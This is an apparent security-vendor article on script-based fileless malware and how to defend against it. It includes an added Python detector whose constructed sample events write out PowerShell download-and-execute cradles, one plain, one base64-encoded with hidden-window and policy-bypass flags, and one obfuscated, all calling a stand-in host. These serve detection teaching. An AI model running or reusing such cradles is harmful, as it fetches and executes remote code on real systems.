EXECUTIVE SUMMARY:

Malware attacks have surged over the past few years. According to one threat report, governments worldwide have seen a 1,885% increase in ransomware attacks alone, and threat actors keep improving both their technical sophistication and their means of evading detection.

Cybercrime groups began using advanced script-based malware around 2017. Since then, the prevalence of script-based malware has more than doubled, and script-based attacks now make up roughly 40% of all cyber attacks.

Scripts offer attackers major advantages. They are easy to write and easy to execute, trivial to obfuscate, and cheap to regenerate as fresh (polymorphic) variants, which makes them hard to stop with conventional, signature-based tools.

How can an attacker execute malware through a script?

Scripts are typically small programs written in languages such as Python, JScript, Bash, PHP, Visual Basic (VBScript/VBA), Ruby or PowerShell. As with most technology, people use scripts for both good and bad ends. Administrators use them to make a computer behave in a desired way, for example to install a new, approved application. Attackers use exactly the same capability to download and run malware and so compromise the system.

A typical fileless chain is delivered by email as a Word document containing a malicious macro. The macro (VBA, Office's Visual Basic dialect) launches a hidden PowerShell process, which reaches out to the internet, downloads the next stage and runs it directly in memory. Only the lure document ever touches the disk; the downloaded payload is never written to it, so file-scanning antivirus has nothing to inspect. Script-based attacks are designed precisely to slip past the conventional anti-malware and antivirus products on computers and devices.

Another reason malicious scripts are hard to spot is that most organizations do not collect event logs from employee computers. Unless PowerShell script block logging (event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) and process-creation auditing with command lines (Security event 4688, or Sysmon event 1) are forwarded centrally and in near real time, there is nothing for a SIEM rule to trigger on. Some malware also looks for security tools on the PC and removes or disables them. Without an endpoint detection product that inspects script content and process behaviour, you will have a hard time finding evidence that a script ever ran.
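As an added illustration (example code written for this page, not code from the article or from any vendor product), the following Python detector runs over a few constructed process-creation log lines in the shape of Sysmon event 1 / Security 4688 records and flags the chain described above: a script host spawned by an Office process, a base64 -EncodedCommand payload (which it decodes from UTF-16LE), and download-and-execute cradles even when they are split up with backticks or string concatenation. The field names (Image, ParentImage, CommandLine), the indicator list and the sample events are assumptions constructed for the example; mshta.exe and wscript.exe are included as script hosts because the same rule covers HTA and JScript droppers.

```python
"""Detection logic for the macro -> hidden PowerShell -> in-memory download
chain, run over constructed process-creation log lines.

Added example, not code from the article. Event field names (Image,
ParentImage, CommandLine) follow Sysmon event 1 naming; the sample lines
below are constructed for this example, not real telemetry.
"""
import base64
import json
import re
from typing import Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators of the chain the article describes; illustrative, not exhaustive.
INDICATORS = [
    (re.compile(r"\b(?:iex|invoke-expression)\b"), "in-memory execution (Invoke-Expression)"),
    (re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"), "download cradle"),
    (re.compile(r"-w[a-z]* hidden"), "hidden window"),
    (re.compile(r"-e[a-z]* bypass"), "execution policy bypass"),
    (re.compile(r"-nop\b|-noprofile"), "profile suppressed"),
    (re.compile(r"frombase64string"), "embedded base64 payload"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalize(script: str) -> str:
    """Undo cheap obfuscation so substring matching works again."""
    s = script.replace("`", "")                 # I`EX -> IEX (backtick is PowerShell's escape char)
    s = re.sub(r"['\"]\s*\+\s*['\"]", "", s)    # 'Down'+'loadString' -> 'DownloadString'
    return re.sub(r"\s+", " ", s).lower()


def analyze_event(event: dict) -> dict:
    """Score one process-creation event and list what was found."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    findings = []
    office_spawn = image in SCRIPT_HOSTS and parent in OFFICE_PARENTS
    if office_spawn:
        findings.append(f"{image} spawned by Office process {parent}")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command decoded")
    # Match the visible command line (base64 blob removed) plus the decoded script.
    text = normalize(ENCODED_FLAG.sub(" ", cmdline) + " " + (decoded or ""))
    findings += [label for pattern, label in INDICATORS if pattern.search(text)]
    return {
        "pid": event.get("ProcessId"),
        "image": image,
        "parent": parent,
        "decoded": decoded,
        "findings": findings,
        # A script host under Office is suspicious on its own; otherwise require two indicators.
        "suspicious": office_spawn or len(findings) >= 2,
    }


def scan(lines) -> list:
    """Analyze one JSON event per line and return the per-event verdicts."""
    return [analyze_event(json.loads(line)) for line in lines if line.strip()]


# Constructed sample events (hypothetical, for this example only).
STAGE2_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
STAGE2_ENCODED = base64.b64encode(STAGE2_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "ProcessId": 4412,
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + STAGE2_ENCODED}),
    json.dumps({"EventID": 1, "ProcessId": 5120,  # obfuscated, not encoded, launched from Explorer
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Windows\\explorer.exe",
                "CommandLine": "powershell -c \"I`EX (New-Object ('Net.'+'WebClient'))"
                               ".('Down'+'loadString')('http://example.invalid/a')\""}),
    json.dumps({"EventID": 1, "ProcessId": 6008,  # benign scheduled inventory script
                "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "ParentImage": "C:\\Windows\\System32\\svchost.exe",
                "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1"}),
]

if __name__ == "__main__":
    for verdict in scan(SAMPLE_EVENTS):
        print(verdict["pid"], "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["findings"])
```

Running the file prints one verdict per event. The point is the normalization step: a plain signature for DownloadString misses 'Down'+'loadString' and a signature for IEX misses I`EX, but the decoded, de-obfuscated text is matched reliably; none of this is possible unless the command line or script block log is collected in the first place.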

The other common delivery method is fake software: a download that looks like a legitimate PDF writer or ZIP utility but contains a script that fetches malware once it is run. Who knew that the IT security policy against downloading unauthorized software really had a purpose?

Advanced script-based malware is a relatively new and increasingly popular attack technique. For attackers, a script is an efficient way to launch malware: scripts provide initial access, improve evasion, and facilitate lateral movement after the initial infection.

As noted above, the later stages of these attacks execute in memory and need not write anything to disk. For attackers this is an advantage: the malware can run on a system without leaving file artifacts, which defeats detection mechanisms built around scanning files. Script-based malware can therefore slip past older and less capable endpoint security products and security gateways.

This is an issue. Here’s what to know…

How script-based malware works

Script-based malware attacks operate in device memory rather than on disk and are generally “fileless.” Attackers commonly use PowerShell to automate infection and data exfiltration, often abusing offensive-security frameworks such as Metasploit or PowerSploit.

Pinning down the origin of a given script-based attack and analyzing it is often hard. Even once analysts catch a particular sample, new script variants can be produced quickly. Current endpoint and email tools send attachments off to be detonated in a sandbox (a facsimile of a user’s desktop) and, if the file proves malicious, quarantine or neutralize it before the user opens it. Bear in mind that sandbox-aware malware may delay or suppress its behaviour when it detects such an environment.

A deeper dive into script-based malware

So…how can an attacker execute malware through a script? The usual approach is to embed the script in a document that carries its own scripting engine, such as an Office document (VBA macros) or a PDF (embedded JavaScript), and send that document to victims, typically as an email attachment.

Other means of executing malware through a script include HTML Applications (HTA) and JavaScript. HTAs are generally distributed as malicious attachments or downloads; an HTA runs through mshta.exe with the full privileges of the user who opened it and outside the browser sandbox, so it can execute arbitrary scripts. JavaScript, by contrast, typically runs when criminals lure users to malicious or compromised websites, where the script exploits browser or plugin vulnerabilities to gain control of the device.

Staying protected from script-based malware

Because script-based malware lives in memory, scanning files on disk is of limited use; defences need to look at script content as it executes and at process behaviour. The following measures help.

1. Segment employees/networks into groups.

Determine which employees need to run scripts as part of their role. Create a second group of people who might occasionally need to run scripts, and a third group of those who never do. Once the groups are defined, enforce that scripts run only from approved, read-only locations and only on designated devices; application control features such as AppLocker or Windows Defender Application Control can enforce this. Do not install unauthorized scripting tools or libraries, and disable those already present where they are not needed.

2. Deploy strong organizational email security.

Advanced corporate email security tools can also prevent this threat, provide notifications about exposed credentials, and more. Modernize legacy gateway-based solutions with API-based email security-as-a-service to protect your email services from the most sophisticated attacks.

3. Protection for all devices.

Hand-held and BYOD devices often fly under the radar when it comes to cyber security. Your email security solution should be able to protect both corporate-owned and personally owned devices. In some cases you can extend protection to employees who use personal devices for work through a corporate-managed license, provided the employee agrees to give up a little space and control on their personal phone.

4. Ensure that systems are patched and updated.

Vulnerable and outdated systems are particularly susceptible to attacks launched from computers already inside the perimeter. Attackers can install malware via a script and then scan internal networks for vulnerabilities and weaknesses to pivot to. Make sure you have effective vulnerability management and patch management programs in place and that critical and high-priority patches are installed within days of release.

In summary

So…how can an attacker execute malware through a script?

Scripts are both helpful tools and a mechanism through which attackers infiltrate organizations. Malicious scripts can deliver or themselves constitute malware, and they are built to evade conventional tools. You’ve read the details above. Make sure your organization takes the right measures against script-based malware attacks, since they can lead to ransomware extortion, data exfiltration, system interruptions or other serious damage.

For more insights into how attackers execute malware through scripts, see CyberTalk.org’s past malware coverage. Lastly, to receive cutting-edge cyber security news, exclusive interviews, expert analyses and security resources, please sign up for the CyberTalk.org newsletter.